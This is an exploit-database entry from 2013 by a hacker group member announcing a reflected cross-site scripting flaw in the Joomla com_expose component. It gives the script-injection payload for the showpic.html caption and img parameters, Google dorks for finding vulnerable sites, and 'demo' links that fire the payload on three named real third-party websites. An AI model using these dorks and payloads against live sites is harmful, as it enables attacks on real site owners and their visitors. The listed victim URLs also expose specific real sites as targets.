Joomla Component com_expose XSS Vulnerability

2013-07-12T00:00:00
ID 1337DAY-ID-20990
Type zdt
Reporter Cloudx
Modified 2013-07-12T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ================================================
Joomla Component com_expose Critical XSS Vulnerability
================================================
+++++++++++++++++
++ C L O U D X ++
+++++++++++++++++
##############################################################
# Exploit Title: Joomla com_expose Critical XSS Vulnerability
# Author: Cloudx
# Date : 12/7/2013
# Facebook Profile: www.fb.com/cloudmrx
# FaceBook Page : www.fb.com/TIFA.T3am
# Email : mr.x.hack[at]live[dot]com
# Category:: webapps
# Google Dork 1: inurl:"components/com_expose/showpic.html"
# Google Dork 2: inurl:"index.php?option=com_expose"
# platform : php
# Vendor: [ N / A ]
# Download : Search Here > http://extensions.joomla.org/ <
# Security Risk : Medium
# Tested on: [Windows 8  64bit ]
########
 
========================
1)Exploit
2)Real.Demo
3)Snapshot
========================

1)Exploit
=========
exploit	 : ?img=&caption="><Script>alert('Cloudx')</Script>
Ex.
http://Localhost/{Path}/components/com_expose/showpic.html?img=&caption="><Script>alert('Cloudx')</Script>

2) Exploit .demo :
============

http://www.originalmusic.co.il/components/com_expose/showpic.html?img=&caption=%22%3E%3CScript%3Ealert%28%27Cloudx%27%29%3C/script%3E

3) Snapshot :
============
http://i.imgur.com/0RMIE7N.png

[~] P0c [~] :
============
 
Vuln file in :
http://Localhost/{Path}/components/com_expose/showpic.html?img=&caption=  <<-----|
 
[~] D3m0 [~] :
=============
 
http://www.originalmusic.co.il/components/com_expose/showpic.html?img=&caption=%22%3E%3CScript%3Ealert%28%27Cloudx%27%29%3C/script%3E
http://www.progressor.ca/components/com_expose/showpic.html?img=%22%3E%3Cscript%3Ealert('cloudx')%3C/script%3E
http://www.jadeco.ir/int/components/com_expose/showpic.html?img=&caption=%22%3E%3CScript%3Ealert%28%27Cloudx%27%29%3C/script%3E
 
=================================**TIFA-Team**===============================================
				##### GreetZ To : TIFA-Team > Cloudx, CityHunter, Abu-3mar, Karamzaza #####
				#####	MSTHTR, Dr.Black, Smail Max, hunter rim, Mr.Ghost,The Blitz	  #####
				#####	 		 Free Palestine <3 , Free Syria <3					  #####
==============================================================================================
TIFA --> T = This , I = Is , F = For , A = Allah
# Facebook Profile: www.fb.com/cloudmrx
# FaceBook Page : www.fb.com/TIFA.T3am

#  0day.today [2018-03-20]  #